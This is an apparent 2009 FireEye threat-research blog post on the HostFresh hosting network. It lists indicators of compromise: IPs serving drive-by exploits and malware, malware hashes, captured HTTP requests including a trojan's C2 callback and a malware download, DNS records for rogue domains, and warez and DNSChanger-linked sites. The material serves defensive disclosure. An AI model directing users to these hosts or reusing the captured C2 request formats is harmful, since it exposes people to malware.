Jump to content

FireEye Malware

Intelligence Lab

Threat research, analysis, and mitigation

« Previous Post | Main | Next Post »

Bad Actors Part 4 - HostFresh

There was an excellent report published in 2008 by HostExploit that showed the connections between Atrivo and those for whom it provided downstream services. One of those such customers was a Chinese provider called HostFresh. I thought it might be interesting to look at two IP blocks which were previously part of the Atrivo network - 58.65.232.0/21 and 116.50.8.0/21 - but are now routed by others.

Below we can see the information registered about HostFresh:

aut-num: AS23898
as-name: HOSTFRESH-AS-AP
descr: HostFresh Internet
descr: Internet Service Provider
country: HK
notify: ipadmin@hostfresh.com

I encourage you to read the blog archive and review parts 1, 2, and 3 of this series to familiarize yourself with the format.

116.50.15.25 - When I browsed to a page on this IP, I was hit with a drive-by-download exploit which installed this piece of malware:

filename: S87ekhV.exe
md5sum:7d70f143b67b8a0fdec403994b37fb4c
sha1sum: 65611bc74db1877e561379b09fefeb71d2f16544

Here is ThreatExpert's report on the payload.  I've seen this specific piece of malware attached to hundreds of different web exploits over the past few weeks.

58.65.232.25 - Similarly, on this other HostFresh IP I found another exploit page (don't type it in your browser) :

GET /counter / ?462158045da0 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1
Referer: http://sineadhalpineventing.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: keep-alive
Host: 58.65.232.25

58.65.235.9 - This is a callback for a generic dropper trojan that is not widely distributed:

GET /c2.php?a=xxxxxxx&b=384&c=302&d=1&e=0&f=0&g=404&h=90 HTTP/1.1
Host: 58.65.235.9
Cache-Control: no-cache


58.65.237.1 - Below you see malware hosted on this IP:

GET /4bm.exe HTTP/1.1
Referer: http://58.65.237.1/4bm.exe
Host: 58.65.237.1

VirusTotal report of the malware.

58.65.234.169 - all-nettinfo.com - Another exploit page is hosted here. Here is the malicious PDF of choice used on this server:
VirusTotal report

One interesting nugget I found about HostFresh was that it is home to a remarkably high (in terms of density) number of websites that cater to the underground warez scene. Many of the sites are forums for hosting direct links to tv/mp3s/pr0n/etc, some are for streaming bootleg movies, and others are tailored to a specific genre such as anime. The one thing these all have in common is that if they were hosted in the United States, surely there would be takedowns from the MPAA/RIAA issued to the hosting providers.

58.65.233.97 - moviefather.com - illegal movies

58.65.233.97 - xoxomovie.com - illegal movies

58.65.233.97 - davidmovie.com - illegal movies

58.65.234.164 - www.googleanalitics.net - exploits

58.65.234.164 - www.googleanalytlcs.com - exploits

58.65.234.165 - e.fissare.net - exploits. It also redirected me to gotruescan.com, mainscan6.com, and in6co.com, all rogue sites. This currently resolves to 127.0.0.1.

116.50.14.161 - ipb.quicksilverscreen.com - illegal movies

116.50.14.169 - anime6.org - shutdown, illegal movies

116.50.14.201 - familyguynow.com – Family Guy streaming

116.50.14.209 - warez-bb.org - warez sharing

116.50.14.169 movie6.net - illegal movies

116.50.15.89 - rapidlinks.co.uk – generic warez trading

116.50.15.97 - www.vid-stream.com - illegal movies

116.50.15.98 - www.futurama-stream.com – Futurama streaming

116.50.15.107 - www.da-anime.info - anime sharing

116.50.15.107 - www.da-forums.info - tv sharing

116.50.15.122 - sharedxs.com - warez sharing

116.50.15.125 - thephoenix-forums.com - warez sharing


Another way that HostFresh’s servers are being used to host “badness” is by hosting DNS services for other malicious domains. It would only make sense to host the actual malware site and the DNS server on different providers. This would add another layer to the resiliency to the malware network. Below you can see a malicious site that is using four different providers – HostFresh, UralNet (future blog posting alert!), Server-LU, and Netdirect-Net (also rates high on the “badness” scale).

st-athome.net - malware
;; ADDITIONAL SECTION:
ns1.st-athome.net.   3600  IN   A    91.211.64.71
ns4.st-athome.net.   3600  IN   A    212.117.162.90
ns3.st-athome.net.   3600  IN   A    89.149.226.121
ns2.st-athome.net.   3600  IN   A    116.50.15.1

Below you can see many of the DNS servers for malicious domains being hosted at HostFresh:

admediastats.com - redirects to rogues
ns2.admediastats.com.  3159  IN   A    116.50.15.1

adtrafficsolution.com - redirects to rogues
ns1.adtrafficsolution.com. 3158 IN   A    58.65.237.41

advertisenetworktour.cn - redirects to rogues
ns2.singatours.com.   172146 IN   A    58.65.237.81

antimalwareonlinescan.com - rogue
ns2.skycomputingonline.com. 172800 IN  A    115.126.5.10

internetbestsoftware.cn - stopbadware tagged
ns2.singatours.com.   171864 IN   A    58.65.237.81

kup9.com - stopbadware tagged
ns1.kup9.com.      171844 IN   A    58.65.234.81
ns2.kup9.com.      171844 IN   A    58.65.234.81

mssetup.net - rogue
ns2.dnstut.com.     171863 IN   A    58.65.233.33
ns3.dnstut.com.     171863 IN   A    58.65.233.34

of-ficialstat.com - hosting malware (credit: msmvps.com)
ns2.of-ficialstat.com. 2677  IN   A    116.50.15.1

privaetprotectedupdates.com - rogue
dns1.systempromns.com. 171640 IN   A    58.65.237.81

securityclick.net - rogue
ns2.securityclick.net. 2412  IN   A    116.50.15.1

st-aticglobalsources.com - rogue
ns2.st-aticglobalsources.com. 2413 IN  A    116.50.15.1

st-ation-appraisals.net - rogue
ns2.st-ation-appraisals.net. 2413 IN  A    116.50.15.1

undernation.com - warez sharing
ns1.hostworm.com.    172800 IN   A    116.50.15.57
ns2.hostworm.com.    172781 IN   A    116.50.15.57

These sites were being hijacked using a malicious DNS server on 58.65.237.41, although it does not at the time of writing appear to be responding.
cleaner2009solution.com - rogue
microsoft.securityinformationcenter.com - rogue

These domains I previous pointed out were being hosted at HostFresh:
proxima.ircgalaxy.pl - 58.65.234.89 - C&C
proxim.ircgalaxy.pl - 58.65.234.90 - C&C

The following domains I saw being hijacked (or properly hosted?) by a DNS server on 58.65.233.74. This DNS server is no longer responding, but I saw piles of DNS queries going to it over the past week.

The responsible DNSChanger trojan is this piece of malware

Here is the list of domains trying to be resolved by that IP, *all of which are pornographic in nature*, and have been used in banner ads and in spam. Not Safe For Work.

bestoffred.com
bestredcross.com
bestzoomers.com
bigredstock.com
bigskyred.com
ferscarlet.com
greatscarlet.com
nummundo.com
livrenum.com
numplaneta.com
numquia.com
numva.com
numvivo.com
olympusspeed.com
redhotbid.com
redhotnow.com
xuddi.com
yourredbull.com
yourredlight.com
zipzoomscoot.com
zoomrapid.com
zoomtownnews.com
zoomtownskate.com

In conclusion, HostFresh does not seem to be the source of as much badness as it was in the Atrivo days, but it’s far from what I would consider a clean network.

Alex Lanstein @ FireEye Malware Intelligence Lab
Questions/Comments to research [@] fireeye [.] com

Account Deleted on 2009.02.27 Bad Actors

TrackBack

TrackBack URL for this entry:
http://www.typepad.com/services/trackback/6a00d835018afd53ef0111689d0d7c970c

Listed below are links to weblogs that reference Bad Actors Part 4 - HostFresh:

Recent Comments

Feed You can follow this conversation by subscribing to the comment feed for this post.

The comments to this entry are closed.